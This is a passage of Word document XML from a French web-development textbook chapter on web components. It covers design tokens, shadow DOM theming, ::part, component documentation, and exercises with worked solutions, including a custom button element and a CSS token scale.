            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Primitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--couleur-navy-700</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2854"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le système uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Sémantique</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--couleur-texte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="285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Les composants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Composant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--carte-padding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2854"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le composant et ses surcharges</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LES JETONS TRAVERSENT LE SHADOW DOM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Les propriétés personnalisées sont héritées : un composant peut lire </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>var(--couleur-texte)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> même enfermé dans un shadow DOM. C'est le mécanisme de thème recommandé.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une porte de sortie explicite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Personnalisation contrôlée depuis l'extérieur */</w:t>
        <w:br/>
        <w:t>carte-produit::part(prix) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-weight: 700;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: var(--couleur-accent);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Dans le composant */</w:t>
        <w:br/>
        <w:t>/* &lt;span part="prix" class="prix"&gt;&lt;/span&gt; */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>38.5 Documenter la bibliothèque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un composant non documenté est un composant que personne n'utilise correctement. La documentation minimale décrit l'usage, les attributs, les événements et les règles d'accessibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une fiche de composant · markdown</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`&lt;carte-produit&gt;`</w:t>
        <w:br/>
        <w:br/>
        <w:t>Présente un produit dans une liste.</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Attributs</w:t>
        <w:br/>
        <w:t>| Nom          | Type    | Défaut | Description          |</w:t>
        <w:br/>
        <w:t>|--------------|---------|--------|----------------------|</w:t>
        <w:br/>
        <w:t>| `titre`      | chaîne  | —      | Nom du produit       |</w:t>
        <w:br/>
        <w:t>| `prix`       | nombre  | `0`    | Prix en unités       |</w:t>
        <w:br/>
        <w:t>| `devise`     | chaîne  | `EUR`  | Code ISO 4217        |</w:t>
        <w:br/>
        <w:t>| `est-active` | booléen | absent | Met la carte en avant|</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Slots</w:t>
        <w:br/>
        <w:t>- `action` : lien ou bouton d'action.</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Événements</w:t>
        <w:br/>
        <w:t>- `carte:selection` : émis au clic sur l'action.</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Accessibilité</w:t>
        <w:br/>
        <w:t>Le titre est un `h3`. Le conteneur porte `role="group"` et le nom</w:t>
        <w:br/>
        <w:t>accessible provient du titre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="47" name="Picture 47"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f45.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.45 — Le cycle de vie d'un composant</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TROIS QUESTIONS AVANT DE CRÉER UN COMPOSANT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Est-il utilisé au moins trois fois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Sa sémantique HTML est-elle correcte sans JavaScript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Que se passe-t-il s'il est utilisé dans un contexte imprévu ?</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composant web combine élément personnalisé, shadow DOM et modèle.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connectedCallback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut s'exécuter plusieurs fois.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Les écouteurs se retirent au démontage, idéalement via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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attributs configurent, les propriétés mettent à jour, les événements notifient.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propriétés personnalisées traversent le shadow DOM.</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::part</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offre une personnalisation contrôlée.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composant se documente comme une API publique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les composants se partagent. Le chapitre suivant traite de ce qui circule entre les langues et les cultures : l'internationalisation.</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38.1 — Créer un bouton personnalisé</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 xml:space="preserve">Concevez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;bouton-action&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec variantes et état de chargement.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 xml:space="preserve">Attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>variante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>desactive</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Slot pour le contenu.</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État de chargement annoncé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 38.2 — Construire une échelle de jetons</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Définissez une échelle d'espacement et de couleurs sémantiques.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Primitives numériques.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Alias sémantiques.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Variante sombre complète.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 38.3 — Documenter un composant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   DOCUMENTATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rédigez la fiche de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;carte-produit&gt;</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Attributs avec types et défauts.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Événements émis.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Contraintes d'accessibilité.</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38.1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class BoutonAction extends HTMLElement {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  static observedAttributes = ["variante", "charge", "desactive"];</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  constructor() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    super();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.attachShadow({ mode: "open" }).innerHTML = `</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;style&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        :host { display: inline-block; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        button {</w:t>
        <w:br/>
        <w:t xml:space="preserve">          font: inherit; padding: .6rem 1.1rem; border-radius: 8px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">          border: 1px solid transparent; cursor: pointer;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t>:host([variante="principal"]) button { background: var(--accent, #e0a21b); }</w:t>
        <w:br/>
        <w:t>:host([variante="secondaire"]) button { border-color: currentColor;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        background: none; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        button:disabled { opacity: .6; cursor: progress; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/style&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;button part="bouton"&gt;&lt;slot&gt;&lt;/slot&gt;&lt;/button&gt;`;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    this.#bouton = this.shadowRoot.querySelector("button");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  #bouton;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  connectedCallback() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.#bouton.addEventListener("click", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (this.hasAttribute("charge")) return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      this.dispatchEvent(new CustomEvent("action", { bubbles: true }));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  attributeChangedCallback(nom) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (nom === "charge") {</w:t>
        <w:br/>
        <w:t>this.#bouton.setAttribute("aria-busy", String(this.hasAttribute("charge")));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (nom === "desactive") {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      this.#bouton.disabled = this.hasAttribute("desactive");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>customElements.define("bouton-action", BoutonAction);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;button&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interne conserve le comportement clavier natif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>part="bouton"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de personnaliser l'apparence depuis la page hôte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 38.2</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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-1: .25rem;  --espace-2: .5rem;  --espace-3: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-4: 2rem;    --espace-5: 4rem;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-fond: #ffffff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-surface: #f7f9fa;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte: #1f2933;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte-doux: #5b6770;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-accent: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-danger: #a63a32;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>[data-theme="sombre"] {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-fond: #0b1622;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-surface: #12202e;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte: #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte-doux: #a7b4c0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-accent: #e0a21b;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les composants ne connaissent que les alias sémantiques : changer de thème ne demande aucune modification de leur code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'échelle géométrique (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1, 2, 3, 4, 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) produit un rythme régulier, là où des valeurs arbitraires produisent un espacement incohérent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 38.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;carte-produit&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:br/>
        <w:t>### Attributs</w:t>
        <w:br/>
        <w:t>| Nom | Type | Défaut | Description |</w:t>
        <w:br/>
        <w:t>|-----|------|--------|-------------|</w:t>
        <w:br/>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>titre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | chaîne | — | Nom affiché en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
        <w:br/>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | nombre | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Prix hors taxes |</w:t>
        <w:br/>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>devise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | chaîne | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>EUR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Code ISO 4217 |</w:t>
        <w:br/>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>est-active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | booléen | absent | Bordure accentuée |</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Slots</w:t>
        <w:br/>
        <w:t>- défaut : description</w:t>
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
